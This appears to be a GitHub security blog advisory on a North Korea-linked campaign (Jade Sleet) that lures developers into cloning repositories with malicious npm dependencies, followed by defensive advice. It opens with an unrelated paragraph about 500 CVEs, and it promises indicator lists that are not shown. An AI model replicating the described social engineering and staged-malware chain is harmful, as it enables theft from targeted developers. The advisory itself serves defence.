The GitHub Security Lab audits open source projects for security vulnerabilities and helps maintainers fix them. Recently, we passed the milestone of 500 CVEs disclosed. Let’s take a trip down memory lane with a review of some noteworthy CVEs!
GitHub has identified a low-volume social engineering campaign that targets the personal accounts of employees of technology firms, using a combination of repository invitations and malicious npm package dependencies. Many of these targeted accounts are connected to the blockchain, cryptocurrency, or online gambling sectors. A few targets were also associated with the cybersecurity sector. No GitHub or npm systems were compromised in this campaign. We’re publishing this blog post as a warning for our customers to prevent exploitation by this threat actor.
We assess with high confidence that this campaign is associated with a group operating in support of North Korean objectives, known as Jade Sleet by Microsoft Threat Intelligence and TraderTraitor by the U.S. Cybersecurity and Infrastructure Security Agency (CISA). Jade Sleet mostly targets users associated with cryptocurrency and other blockchain-related organizations, but also targets vendors used by those firms.
The attack chain operates as follows:
- Jade Sleet impersonates a developer or recruiter by creating one or more fake persona accounts on GitHub and other social media providers. Thus far, we have identified fake personas that operated on LinkedIn, Slack, and Telegram. In some cases these are fake personas; in other cases, they use legitimate accounts that have been taken over by Jade Sleet. The actor may initiate contact on one platform and then attempt to move the conversation to another platform.
- After establishing contact with a target, the threat actor invites the target to collaborate on a GitHub repository and convinces the target to clone and execute its contents. The GitHub repository may be public or private. The GitHub repository contains software that includes malicious npm dependencies. Some software themes used by the threat actor include media players and cryptocurrency trading tools.
- The malicious npm packages act as first-stage malware that downloads and executes second-stage malware on the victim’s machine. Domains used for the second-stage download are listed below.
The threat actor often publishes their malicious packages only when they extend a fraudulent repository invitation, minimizing the exposure of the new malicious package to scrutiny.
In some cases, the actor may deliver the malicious software directly on a messaging or file sharing platform, bypassing the repository invitation/clone step.
The mechanics of the first-stage malware are described in detail in a blog by Phylum Security.
Phylum’s work, conducted completely independent of GitHub, mirrors our own research.
- We have suspended npm and GitHub accounts associated with the campaign.
- We are publishing indicators below.
- We have filed abuse reports with domain hosts in cases where the domain was still available at time of detection.
- If you were solicited, by anyone, to clone or download content associated with one of the accounts noted below, then you were targeted by this campaign.
- You can review your security log for
action:repo.add_memberevents to determine if you ever accepted an invite to a repository from one of the accounts noted below.
- Be wary of social media solicitations to collaborate on or install npm packages or software that depends on them, particularly if you are associated with one of the targeted industry sectors listed above.
- Examine dependencies and installation scripts. Very recently published, net-new packages, or scripts or dependencies that make network connections during installation should receive extra scrutiny.
- If you were targeted by the campaign, we recommend you contact your employer’s cybersecurity department.
- If you executed any content as a result of this campaign, it may be prudent to reset or wipe potentially affected devices, change account passwords, and rotate sensitive credentials/tokens stored on the potentially affected device.